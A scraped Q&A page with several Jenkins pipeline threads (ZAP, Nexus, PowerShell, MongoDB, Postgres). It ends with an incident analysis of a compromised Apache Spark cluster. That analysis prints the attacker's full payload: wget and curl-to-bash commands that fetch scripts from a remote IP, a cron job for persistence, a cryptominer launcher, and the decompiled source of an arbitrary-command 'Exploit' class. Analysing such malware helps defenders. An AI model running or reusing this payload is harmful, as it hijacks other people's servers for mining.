INFO org.zaproxy.addon.network.ExtensionNetwork - ZAP is now listening on 0.0.0.0:8090 - owasp

I have created one pipeline to use OWASP ZAP,
pipeline {
agent any
stages {
stage('Execute Zap Jar') {
steps {
sh '''
java -jar /home/pl/tools/com.cloudbees.jenkins.plugins.customtools.CustomTool/OwaspZap/ZAP_2.12.0/zap-2.12.0.jar -dir "/home/pl/.ZAP" -host 0.0.0.0 -port 8090 -daemon -config api.disablekey=true
'''
}
}
stage('Execute Zap CLI') {
steps {
sh '''
export ZAP_URL=http://localhost && export ZAP_PORT=8090 && zap-cli status
'''
}
}
stage('Execute Zap Session and Zap Scan') {
steps {
sh '''
zap-cli session new && zap-cli spider https://portail-re7-test.XXXXXX.com/ && zap-cli ajax-spider https://portail-re7-test.XXXXXX.com/ && zap-cli active-scan https://portail-re7-test.XXXXXX.com/ && zap session save default
'''
}
}
stage('Extract Zap Report') {
steps {
sh '''
zap-cli report -o report-default.html -f html
'''
}
}
}
}
But it is getting stuck at
7127 [ZAP-daemon] INFO org.zaproxy.addon.network.ExtensionNetwork - ZAP is now listening on 0.0.0.0:8090
can someone please help me what I am doing wrong
Regrads,
SAM

It looks like ZAP is acting as expected - its been started and is listenning on port 8090.
It has been started in daemon mode and so will stay running until you stop it.
FYI this is not one of the recommended ways to run ZAP - these are listed on https://www.zaproxy.org/docs/automate/
I'd recommend using the Automation Framework :)

Related

Deploy docker image from Nexus registry

I have this Jenkinsfile which I want to use to build a pipeline:
pipeline {
agent any
environment {
NEXUS_VERSION = "nexus3"
NEXUS_PROTOCOL = "http"
NEXUS_URL = "you-ip-addr-here:8081"
NEXUS_REPOSITORY = "maven-nexus-repo"
NEXUS_CREDENTIAL_ID = "nexus-user-credentials"
}
stages {
stage('Download Helm Charts') {
steps {
sh "echo 'Downloading Helm Charts from Bitbucket repository...'"
// configure credentials under http://192.168.1.28:8080/user/test/credentials/ and put credentials ID
// not sure do I need to point the root folder of the Helm repository or only the single chart
checkout scmGit(
branches: [[name: 'master']],
userRemoteConfigs: [[credentialsId: 'c2672602-dfd5-4158-977c-5009065c867e',
url: 'http://192.168.1.30:7990/scm/jen/helm.git']])
}
}
stage('Test Kubernetes version') {
steps {
sh "echo 'Checking Kubernetes version..'"
// How to do remote test of kubernetes version
}
}
stage('Push Helm Charts to Kubernetes') {
steps {
sh "echo 'building..'"
// push here helm chart from Jenkins server to Kubernetes cluster
}
}
stage('Build Image') {
steps {
sh "echo 'building..'"
// configure credentials under http://192.168.1.28:8080/user/test/credentials/ and put credentials ID
git credentialsId: 'bitbucket-server:50001e738fa6dafbbe7e336853ced1fcbc284fb18ea8cda8b54dbfa3a7bc87b9', url: 'http://192.168.1.30:7990/scm/jen/spring-boot-microservice.git', branch: 'master'
// execute Java -jar ... and build docker image
./gradlew build && java -jar build/libs/gs-spring-boot-docker-0.1.0.jar
docker build -t springio/gs-spring-boot-docker .
}
}
stage('Push Image into Nexus registry') {
steps {
sh "echo 'building..'"
// push compiled docker image into Nexus repository
script {
pom = readMavenPom file: "pom.xml";
filesByGlob = findFiles(glob: "target/*.${pom.packaging}");
echo "${filesByGlob[0].name} ${filesByGlob[0].path} ${filesByGlob[0].directory} ${filesByGlob[0].length} ${filesByGlob[0].lastModified}"
artifactPath = filesByGlob[0].path;
artifactExists = fileExists artifactPath;
if(artifactExists) {
echo "*** File: ${artifactPath}, group: ${pom.groupId}, packaging: ${pom.packaging}, version ${pom.version}";
nexusArtifactUploader(
nexusVersion: NEXUS_VERSION,
protocol: NEXUS_PROTOCOL,
nexusUrl: NEXUS_URL,
groupId: pom.groupId,
version: pom.version,
repository: NEXUS_REPOSITORY,
credentialsId: NEXUS_CREDENTIAL_ID,
artifacts: [
[artifactId: pom.artifactId,
classifier: '',
file: artifactPath,
type: pom.packaging],
[artifactId: pom.artifactId,
classifier: '',
file: "pom.xml",
type: "pom"]
]
);
} else {
error "*** File: ${artifactPath}, could not be found";
}
}
}
}
stage('Deploy Image from Nexus registry into Kubernetes') {
steps {
sh "echo 'building..'"
}
}
stage('Test'){
steps {
sh "echo 'Testing...'"
// implement a check here is it deployed sucessfully
}
}
}
}
How I can deploy the docker image build by Jenkins server and pushed in Nexus repository? If possible I want to use service account with token?
Instead of using 'nexusArtifactUploader', why don´t you use docker push, like you do to build the image?
I guess nexusArtifactUploader uses Nexus API and doesn´t work with docker images, but you can access the registry using docker and the exposed port (defaults to 5000)
withCredentials([string(credentialsId: NEXUS_CREDENTIAL_ID, variable: 'registryToken')]) {
sh 'docker push --creds default:${registryToken} your-registry-url/image-name:image-tag'
}
You may also change docker build command to build the image using your registry name (or tag it after building, see How to push a docker image to a private repository)

Jenkinsfile with Docker PowerShell image is getting hanged

When the Docker powershell gets invoked from a jenkinsfile it keeps executing and the job doesn't gets terminated.
pipeline {
agent {
docker {
image 'mcr.microsoft.com/azure-powershell'
args "--mount type=bind,src=/opt,dst=/opt -i -t --entrypoint=''"
}
}
stages {
stage('PwShell') {
steps {
powershell(returnStdout: true, script: 'Write-Output "PowerShell is mighty!"')
}
}
}
}
jenkin-job-hang
As you have not provided any log details it's tough to pin point the error as why it is stuck. Generally, for Jenkins declarative pipeline like the following -
pipeline {
agent {
docker { image '...abc.com' }
}
stages {
stage('Test') {
steps {
sh 'node --version'
}
}
}
}
When the Pipeline executes, Jenkins will automatically start the specified container and execute the defined steps within it:
[Pipeline] stage
[Pipeline] { (Test)
[Pipeline] sh
[guided-tour] Running shell script
+ node --version
v14.15.0
[Pipeline] }
[Pipeline] // stage
[Pipeline] }
And since you are stuck in the PowerShell line in the steps, it means the steps is not correctly set.
If you check this Microsoft PowerShell Support for Pipeline document then you will find that by default returnStdout returns the standard output stream with a default encoding of UTF-8. And Write-Output cmdlet returns an output stream.
You should be able to solve your problem by following the changing your PowerShell line as the code snippet shown below.
steps {
def msg = powershell(returnStdout: true, script: 'Write-Output "PowerShell is mighty!"')
println msg
}
Check this example section of the same above mentioned document for more detailed operations on the PowerShell steps.
I would also suggest to read this Using Docker with Pipeline document for more information.

run my test in docker mongo instance using jenkins pipeline

I would like to run my tests against a Docker MongoDB instance using Jenkins pipeline. I have got it working kind of. My problem is the tests are running within the Mongo container. I just want it to load up a container and my tests for it to connect to the Monogo container. At the moment it downloads Gradle within the container and takes about 5 min to run. Hope that makes sense. Here is my JenkinsFile
#!/usr/bin/env groovy
pipeline {
environment {
SPRING_PROFILES_ACTIVE = "jenkins"
}
agent {
node {
label "jdk8"
}
}
parameters {
choice(choices: 'None\nBuild\nMinor\nMajor', description: '', name: 'RELEASE_TYPE')
string(defaultValue: "refs/heads/master:refs/remotes/origin/master", description: 'gerrit refspec e.g. refs/changes/45/12345/1', name: 'GERRIT_REFSPEC')
choice(choices: 'master\nFETCH_HEAD', description: 'gerrit branch', name: 'GERRIT_BRANCH')
}
stages {
stage("Test") {
stages {
stage("Initialise") {
steps {
println "Running on ${NODE_NAME}, release type: ${params.RELEASE_TYPE}"
println "gerrit refspec: ${params.GERRIT_REFSPEC}, branch: ${params.GERRIT_BRANCH}, event type: ${params.GERRIT_EVENT_TYPE}"
checkout scm
sh 'git log -n 1'
}
}
stage("Verify") {
agent {
dockerfile {
filename 'backend/Dockerfile'
args '-p 27017:27017'
label 'docker-pipeline'
dir './maintenance-notifications'
}
}
steps {
sh './gradlew :maintenance-notifications:backend:clean'
sh './gradlew :maintenance-notifications:backend:check :maintenance-notifications:backend:test'
}
post {
always {
junit 'maintenance-notifications/backend/build/test-results/**/*.xml'
}
}
}
}
}
stage("Release") {
when {
expression {
return params.RELEASE_TYPE != '' && params.RELEASE_TYPE != 'None';
}
}
steps {
script {
def gradleProps = readProperties file: "gradle.properties"
def isCurrentSnapshot = gradleProps.version.endsWith("-SNAPSHOT")
def newVersion = gradleProps.version.replace("-SNAPSHOT", "")
def cleanVersion = newVersion.tokenize(".").collect{it.toInteger()}
if (params.RELEASE_TYPE == 'Build') {
newVersion = "${cleanVersion[0]}.${cleanVersion[1]}.${isCurrentSnapshot ? cleanVersion[2] : cleanVersion[2] + 1}"
} else if (params.RELEASE_TYPE == 'Minor') {
newVersion = "${cleanVersion[0]}.${cleanVersion[1] + 1}.0"
} else if (params.RELEASE_TYPE == 'Major') {
newVersion = "${cleanVersion[0] + 1}.0.0"
}
def newVersionArray = newVersion.tokenize(".").collect{it.toInteger()}
def newSnapshot = "${newVersionArray[0]}.${newVersionArray[1]}.${newVersionArray[2] + 1}-SNAPSHOT"
println "release version: ${newVersion}, snapshot version: ${newSnapshot}"
sh "./gradlew :maintenance-notifications:backend:release -Prelease.useAutomaticVersion=true -Prelease.releaseVersion=${newVersion} -Prelease.newVersion=${newSnapshot}"
}
}
}
}
}
and here is my Dockerfile
FROM centos:centos7
ENV container=docker
RUN mkdir -p /usr/java; curl http://configuration/yum/thecloud/artifacts/java/jdk-8u151-linux-x64.tar.gz|tar zxC /usr/java && ln -s /usr/java/jdk1.8.0_151/bin/j* /usr/bin
RUN mkdir -p /usr/mongodb; curl http://configuration/yum/thecloud/artifacts/mongodb/mongodb-linux-x86_64-3.4.10.tgz|tar zxC /usr/mongodb && ln -s /usr/mongodb/mongodb-linux-x86_64-3.4.10/bin/* /usr/bin
ENV JAVA_HOME /usr/java/jdk1.8.0_151/
ENV SPRING_PROFILES_ACTIVE jenkins
RUN yum -y install git.x86_64 && yum clean all
# Set up directory requirements
RUN mkdir -p /data/db /var/log/mongodb /var/run/mongodb
VOLUME ["/data/db", "/var/log/mongodb"]
# Expose port 27017 from the container to the host
EXPOSE 27017
CMD ["--port", "27017", "--pidfilepath", "/var/run/mongodb/mongod.pid"]
# Start mongodb
ENTRYPOINT /usr/bin/mongod

How to execute a database script after deploying a Postgresql image to openshift with Jenkins?

I have a git repo with the Jenkins pipeline and the official template of postgresql:
kind: "BuildConfig"
apiVersion: "v1"
metadata:
name: "postgresql-pipeline"
spec:
strategy:
jenkinsPipelineStrategy:
jenkinsfile: |-
pipeline {
agent any
environment {
DATABASE_NAME = 'sampledb'
DATABASE_USER = 'root'
DATABASE_PASSWORD = 'root'
}
stages {
stage('Clone git') {
steps {
git 'https://bitbucket.org/businnessdata_db/postgresql-test.git'
}
}
stage('Deploy db') {
steps {
sh 'oc status'
sh 'oc delete secret/postgresql'
sh 'oc delete pvc/postgresql'
sh 'oc delete all -l "app=postgresql-persistent"'
sh 'oc new-app -f openshift/templates/postgresql-persistent.json'
}
}
stage('Execute users script') {
steps {
sh 'oc status'
}
}
stage('Execute update script') {
steps {
sh 'oc status'
}
}
}
}
type: JenkinsPipeline<code>
What i have to put in the last 2 steps to run a script against the new generated database?
You can either install psql on your Jenkins container and then run the script through the shell command.
sh """
export PGPASSWORD=<password>
psql -h <host> -d <database> -U <user_name> -p <port> -a -w -f <file>.sql
"""
Or, since Jenkinsfiles are written in Groovy, use Groovy to execute your statements. Here's the Groovy documentation for working with databases.

apache spark executor submit driver with exploit class

After a lot search and research, I turn to find help here.
The problem is that once a Spark cluster is built(one master and 4 workers with different IP address), each executor will submit "driver" constantly. From web UI, I can see a class named "Exploit" submitted with the "driver". web UI
Following is head and tail of log file of one worker.
Launch Command: "/usr/lib/jvm/jdk1.8/jre/bin/java" "-cp" "/home/labuser/spark/conf/:/home/labuser/spark/jars/*" "-Xmx1024M" "-Dspark.eventLog.enabled=true" "-Dspark.driver.supervise=false" "-Dspark.submit.deployMode=cluster" "-Dspark.app.name=Exploit" "-Dspark.jars=http://192.99.142.226:8220/Exploit.jar" "-Dspark.master=spark://129.10.58.200:7077" "org.apache.spark.deploy.worker.DriverWrapper" "spark://Worker#129.10.58.202:44717" "/home/labuser/spark/work/driver-20180815111311-0065/Exploit.jar" "Exploit" "wget -O /var/tmp/a.sh http://192.99.142.248:8220/cron5.sh,bash /var/tmp/a.sh
18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.allocator.type: unpooled
18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.threadLocalDirectBufferSize: 65536
18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.maxThreadLocalCharBufferSize: 16384
18/08/15 11:13:56 DEBUG NetUtil: Loopback interface: lo (lo, 0:0:0:0:0:0:0:1%lo)
18/08/15 11:13:56 DEBUG NetUtil: /proc/sys/net/core/somaxconn: 128
18/08/15 11:13:57 DEBUG TransportServer: Shuffle server started on port: 46034
18/08/15 11:13:57 INFO Utils: Successfully started service 'Driver' on port 46034.
18/08/15 11:13:57 INFO WorkerWatcher: Connecting to worker spark://Worker#129.10.58.202:44717
18/08/15 11:13:58 DEBUG TransportClientFactory: Creating new connection to /129.10.58.202:44717
18/08/15 11:13:59 DEBUG AbstractByteBuf: -Dio.netty.buffer.bytebuf.checkAccessible: true
18/08/15 11:13:59 DEBUG ResourceLeakDetector: -Dio.netty.leakDetection.level: simple
18/08/15 11:13:59 DEBUG ResourceLeakDetector: -Dio.netty.leakDetection.maxRecords: 4
18/08/15 11:13:59 DEBUG ResourceLeakDetectorFactory: Loaded default ResourceLeakDetector: io.netty.util.ResourceLeakDetector#350d33b5
18/08/15 11:14:00 DEBUG TransportClientFactory: Connection to /129.10.58.202:44717 successful, running bootstraps...
18/08/15 11:14:00 INFO TransportClientFactory: Successfully created connection to /129.10.58.202:44717 after 1706 ms (0 ms spent in bootstraps)
18/08/15 11:14:00 INFO WorkerWatcher: Successfully connected to spark://Worker#129.10.58.202:44717
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.maxCapacity.default: 32768
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.maxSharedCapacityFactor: 2
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.linkCapacity: 16
18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.ratio: 8
I found there is a "Exploit" code which hacks Spark cluster by taking advantage of the fact that anyone can submit applications to an unauthorized Spark cluster.
ARBITRARY CODE EXECUTION IN UNSECURED APACHE SPARK CLUSTER
But I don't think my cluster is hacked. Cause after applying authorized mode, this problem still exists.
My question is anyone else have this problem? And why would this happen?
THIS IS VERY ALARMING!
Firstly, the decompiled source code shows that the driver will execute commands supplied to it via arguments. In your case, this wget to download the script to temp, then execute it.
The downloaded script downloads a jpg and piped to bash. THIS IS NOT AN IMAGE
wget -q -O - http://192.99.142.248:8220/logo10.jpg | bash -sh
logo10.jpg contains a cron job that contains even more source code that will be run on your cluster. You are probably seeing this job being submitted because it is starting a scheduled job.
#!/bin/sh
ps aux | grep -vw sustes | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w sustes |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true && \
echo "* * * * * wget -q -O - http://192.99.142.248:8220/mr.sh | bash -sh" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true && \
wget -O /var/tmp/config.json http://192.99.142.248:8220/3.json
wget -O /var/tmp/sustes http://192.99.142.248:8220/rig
chmod 777 /var/tmp/sustes
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./sustes -c config.json -t `echo $cores` >/dev/null &
fi
sleep 3
echo "runing....."
Decompiled Source
public class Exploit {
public Exploit() {
}
public static void main(String[] var0) throws Exception {
String[] var1 = var0[0].split(",");
String[] var2 = var1;
int var3 = var1.length;
for(int var4 = 0; var4 < var3; ++var4) {
String var5 = var2[var4];
System.out.println(var5);
System.out.println(executeCommand(var5.trim()));
System.out.println("==============================================");
}
}
private static String executeCommand(String var0) {
StringBuilder var1 = new StringBuilder();
try {
Process var2 = Runtime.getRuntime().exec(var0);
var2.waitFor();
BufferedReader var3 = new BufferedReader(new InputStreamReader(var2.getInputStream()));
String var4;
while((var4 = var3.readLine()) != null) {
var1.append(var4).append("\n");
}
} catch (Exception var5) {
var5.printStackTrace();
}
return var1.toString();
}
}